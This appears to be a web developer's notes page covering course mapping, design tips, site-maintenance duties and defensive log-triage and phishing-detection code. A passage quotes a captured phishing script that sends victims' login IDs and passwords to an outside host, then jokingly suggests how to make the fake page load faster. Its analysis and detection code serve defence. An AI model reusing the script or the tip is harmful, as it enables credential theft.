Mapping CS Courses to Internet Software Engineering

These aren’t specific courses; the intention is to provide a rough parallel. They aren’t in a particular order, and multi-semester study is implied for some areas.

  • Operating Systems - Particularly Linux. Appreciation of the hardware that makes the system work, especially the server. Understanding of the commands, organization, processing. Use of log files.
  • Computer Architecture - Key concepts - physical elements that make up the machine. Capabilities and limitations. CPUs, memory, disks, interrupts, timing, queues, caching. Performance considerations. Requirements awareness.
  • OOP / Data Structures - Ability to abstract a system into components that can be efficiently operated on. Queues, linked lists, trees, arrays, multi-dimensional arrays, matrices, classes and objects. Methods, properties and events. Vital for server and client side.
  • Algorithms - Appreciation for the impact of how code is written on performance. This is especially important because many web applications are written in interpreted languages. Awareness of high overhead operations (which can be avoided or performed by existing library functions).
  • Logic - The ability to break a problem into manageable pieces and write efficient code.
  • Systems Analysis - Developing a high level perspective to understand how system components interface and interact. Distribution of requirements.
  • Technical Writing - Written communication is vital to describe the work that will be performed.
  • Assembly Language - A view inside the processor. Although not necessary, it is valuable to understand what the processor is, what it does, how it does it, and how to control it. Complements the OS and Computer Architecture courses.
  • Data Communications / Introduction to Networking - Writing code for the Internet is heavily influenced by its distribution. It is important to know how the data gets from the server to the client and back again. This affects how pages are constructed. Key elements, difference between form and content, compression, bandwidth.
  • Security - Use of encryption, OpenSSL, protecting data, web application firewalls, passwords, ports, server firewalls, watchdogs, etc.
  • Server Software - IIS or Apache. How requests are received, protection of data, efficient use of disk space and bandwidth. Caching. How to create and manage accounts. Use of web stats to monitor sites. Use of log files.
  • Current Industry Trends - Frameworks, template systems, AJAX, toolkits, CDNs.

More Cost-Effective Design Strategies

  • Work within application design architectures. In other words, try to use as much of their HTML and CSS as possible, or replace just the CSS. Most good applications have a nice hierarchical CSS and template organization. Learn to work with it. Many applications allow the addition and removal of widgets and tools from the admin interface. Accommodate that and support it. It is extremely valuable.
  • Use icon sets. They will allow you to provide a beautiful interface in a fraction of the time. http://www.everaldo.com/crystal/. Support these projects if possible, ask your employer.
  • Use toolkits, but carefully. If it is a simple feature, code it yourself. If it is complex, find a toolkit or JavaScript library.
  • Keep the layout and colors separate in the CSS. That way, you can reskin an application in different ways, easily. Use browser specific overrides where necessary.
  • If you are building an application, use a hierarchical template structure and create components that can support the whole system, instead of just one page.

Web Sites - Behind the Scenes

A web site is the most visible part of a company's Internet presence, but not the only part.

The following issues must be continually addressed and frequently monitored:

  • Content Maintenance - This includes all content changes. It may also require navigation changes. Many sites use content management systems such as eZ publish, Drupal, or Joomla. These make editing content easier, but still require some training. The content itself is important, but its presentation must also be considered. Web pages should be easy to read and informative. They should be attractive and consistent with the other pages on the site. The content should be consistent with the language of the target site visitors. If it is a professional site, everything should be spelled properly, cased properly, and grammatically correct. Slang should be avoided.
  • Email - Careful use of email accounts and forwarders is important. Forwarders allow the same address to deliver messages to multiple people. In addition, a forwarder can ease personnel transitions: the email address does not have to change if a different person is handling it. Email accounts must be budgeted. Disk space is cheap, but it isn’t free. In most cases, the disk space used by email is deducted from the available space for the site. For that reason, one must keep track of the number of accounts and how big each mailbox is. Notification should be set up to ensure people are alerted when their mailbox is full. Issues that can take a lot of time include recovering if the domain or server is blacklisted, emails blocked for various reasons, and client configuration issues.
  • Contact mechanisms - First, one must comply with the anti-spam laws: http://www.ftc.gov/bcp/conline/pubs/buspubs/canspam.shtm. Newsletter content can also be a valuable part of a site. In addition, contact mechanisms must be protected from abuse. Tools available include CAPTCHA http://www.captcha.net/, Akismet http://akismet.com/, http://ostermiller.org/contactform/, and custom code.
  • Logs - Error and access logs should be checked at least weekly for any unusual entries, for example missing pages or images. Some hacking attempts will show up in the error logs as file-not-found errors, usually with distinct URLs and repeated requests into forbidden areas. Restricted areas should not be served; if they are, the web server configuration should be updated to protect them. IP address patterns should be observed to see if requests (potential attacks) are from a specific area. These can be blocked with a firewall. If you have access to the email logs and the server level logs, particularly the SSH and MySQL logs, they should be reviewed as well.
  • Application Management - It is extremely important to ensure the applications are up to date. Application upgrades range from a simple button click with Fantastico to complex database and patch or upgrade sequences. As a rule, the cost of these upgrades should be included in maintenance allowances.
  • Security - In the unfortunate instance when an application is hacked, it must be cleaned up, and usually the application must be upgraded. These tend to be emergencies and often result in outages. Careful Application Management (above) can greatly reduce these. Credit card and personal data must be handled very carefully (ideally by someone well-qualified :yes: ). https://www.pcisecuritystandards.org/
  • External Interfaces - Many sophisticated sites have complex interfaces into payment gateways or web services. This type of code usually requires strong engineering skills.
  • SSL Certificates - To support HTTPS for ecommerce and secure access to information, certificates must be purchased, approved, installed, and then renewed as required. Renewal requires reinstallation.
  • Web stat checks - Periodic review of the web stats allows an evaluation of the site’s search engine positioning, sources of traffic, keywords, and pages accessed.
  • Performance - Site visitors expect a timely display of a site. There are many ways to ensure a site performs well, and the best solutions vary by the type of site. However, the following issues are clear: client-side caching should be used; content delivery networks are valuable for offloading the server and the network; images must be optimized, delivered properly through the server and displayed properly by all supported browsers; JavaScript should be portable and efficient; and page construction should be evaluated with tools like http://websiteoptimization.com prior to launch and after major changes.
  • Custom code - Custom code should be carefully audited for security: http://phpsec.org, http://www.fortify.com/security-resources/rats.jsp. It should be protected by a web application firewall such as http://modsecurity.org.
  • Quality Assurance - Time must be taken to check the site for problems like broken links to external resources, and any problems within the site itself.
  • Technical Quality - The quality of code used on a site is visible to all visitors. How it looks in the browser, and the code that delivers it, should be high-quality, with current technologies applied properly. Poor displays and bad code can harm a company's reputation and professional image.
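
The weekly check described under Logs above can be scripted. The following is an added example, not code from the original page; it assumes Apache combined log format, and the restricted prefixes, the threshold and the sample log lines are constructed for illustration.

```python
import ipaddress
import re
from collections import Counter, defaultdict

# Constructed sample (Apache combined log format, documentation IP ranges).
SAMPLE_LOG = '''\
198.51.100.20 - - [10/May/2010:06:01:11 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.20 - - [10/May/2010:06:01:12 +0000] "GET /images/logo-old.png HTTP/1.1" 404 310 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2010:06:02:01 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 310 "-" "-"
203.0.113.5 - - [10/May/2010:06:02:02 +0000] "GET /admin/config.php HTTP/1.1" 403 290 "-" "-"
203.0.113.5 - - [10/May/2010:06:02:03 +0000] "GET /wp-login.php?x=1 HTTP/1.1" 404 310 "-" "-"
203.0.113.9 - - [10/May/2010:06:02:04 +0000] "GET /admin/ HTTP/1.1" 403 290 "-" "-"
203.0.113.9 - - [10/May/2010:06:02:05 +0000] "GET /backup/site.sql HTTP/1.1" 200 88211 "-" "-"
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
RESTRICTED = ("/admin/", "/backup/")  # assumption: areas that must never be served


def triage(log_text, min_probes=2):
    """Return (suspect clients, restricted URLs that were served, probes per /24)."""
    probes = defaultdict(set)  # client IP -> distinct paths answered 403/404
    served = []                # (client IP, restricted path) answered with 2xx
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, url, status = m.groups()
        path = url.split("?", 1)[0]
        if status in ("403", "404"):
            probes[ip].add(path)
        elif status.startswith("2") and path.startswith(RESTRICTED):
            served.append((ip, path))
    # One stray 404 is usually a broken link; many distinct misses is probing.
    suspects = {ip: sorted(p) for ip, p in probes.items() if len(p) >= min_probes}
    # Group by /24 (IPv4 assumed) to expose sources spread over one network.
    nets = Counter()
    for ip, paths in probes.items():
        nets[str(ipaddress.ip_network(ip + "/24", strict=False))] += len(paths)
    return suspects, served, dict(nets)


if __name__ == "__main__":
    suspects, served, nets = triage(SAMPLE_LOG)
    print("probing clients:", suspects)
    print("restricted content served (fix server config):", served)
    print("403/404 paths per /24:", nets)
```

In the sample, the second client in 203.0.113.0/24 stays under the per-client threshold but shows up in the per-network count, and the 200 response under /backup/ is the kind of entry that calls for a server configuration fix rather than a firewall rule.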

Quantifying Professional Titles

It can be difficult to determine the title assignments within a company. However, there are two definite indicators that can be used to assign titles - time spent on production work (as opposed to time spent leading/managing), and the number of employees the person is responsible for.

With this in mind, the following are recommended guidelines:

  • President - Responsible for entire company. 95% of time spent on management.
  • Vice President - Responsible for portion of company. 90% of time spent on management.
  • Director - Responsible for 25 or more people. 85% of time spent on management.
  • Manager - Responsible for 10 or more people. 75% of time spent on management.
  • Supervisor / Team Leader - Responsible for 5 or more people. 50% of time spent on management.

Every company is different, and there are times when people must assume different roles. Although the numbers may be adjusted, permanently or temporarily, they should be identified and used. Small companies do not need all these positions.

Title inflation is silly.

Nifty Phishing Approach

*** Scam was stopped ***

This phishing attempt was delivered through email, with the above link - claiming maintenance was scheduled. It has some nice text and doesn’t tell you to log in, but provides a link so you can. :)

It looks great.

The code below is the phishing code. It catches the login validation and sends the login ID and password, as query-string parameters of a script request, to the sys82.net server, where your data can be captured.


var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'http://sys82.net/index.php?loh=1&login=' + document.getElementById('loginid').value + '&password=' + document.getElementById('password').value;
document.body.appendChild(script);
return false;

The page content is probably copied live from the real site, with the javascript added in by the phishermen.
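
For triaging a saved copy of a reported page, the check below looks for exactly this pattern: script that reads a password field's value and also references a host other than the legitimate one. It is an added example, not code from the original page; the host names and the sample page are constructed placeholders, and the heuristic only covers the plain getElementById form shown above, not obfuscated script.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"""https?://[^\s'"<>]+""")
VALUE_RE = re.compile(r"""getElementById\(\s*['"]([^'"]+)['"]\s*\)\s*\.value""")

# Constructed sample: a copied login page with an added script (placeholder hosts).
SAMPLE_PAGE = """<form onsubmit="return send();"><input id="loginid">
<input type="password" id="password"></form>
<script>function send() {
  var s = document.createElement('script');
  s.src = 'http://collector.example/index.php?login=' + document.getElementById('loginid').value
      + '&password=' + document.getElementById('password').value;
  document.body.appendChild(s); return false; }
</script>"""


class ScriptCollector(HTMLParser):
    # Collects inline script bodies, on* handler attributes and password field ids.
    def __init__(self):
        super().__init__()
        self.snippets, self.password_ids, self._buf = [], set(), None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._buf = []  # start buffering the script body
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_ids.add(a.get("id"))
        self.snippets += [v for k, v in attrs if k.startswith("on") and v]
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.snippets.append("".join(self._buf))
            self._buf = None


def find_credential_leaks(html, expected_host):
    """Return (password field ids read, foreign hosts) for each offending script."""
    c = ScriptCollector()
    c.feed(html)
    c.close()
    findings = []
    for code in c.snippets:
        read = sorted(set(VALUE_RE.findall(code)) & c.password_ids)
        hosts = {urlparse(u).hostname for u in URL_RE.findall(code)} - {None, expected_host}
        if read and hosts:
            findings.append((read, sorted(hosts)))
    return findings
```

Calling `find_credential_leaks(SAMPLE_PAGE, "bank.example")` reports the password field together with the foreign host, which is the indicator to hand to whoever can get the collecting site taken down.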

Page is slow. Would be good to take a screenshot and use that as a background while the real page loads. :yes: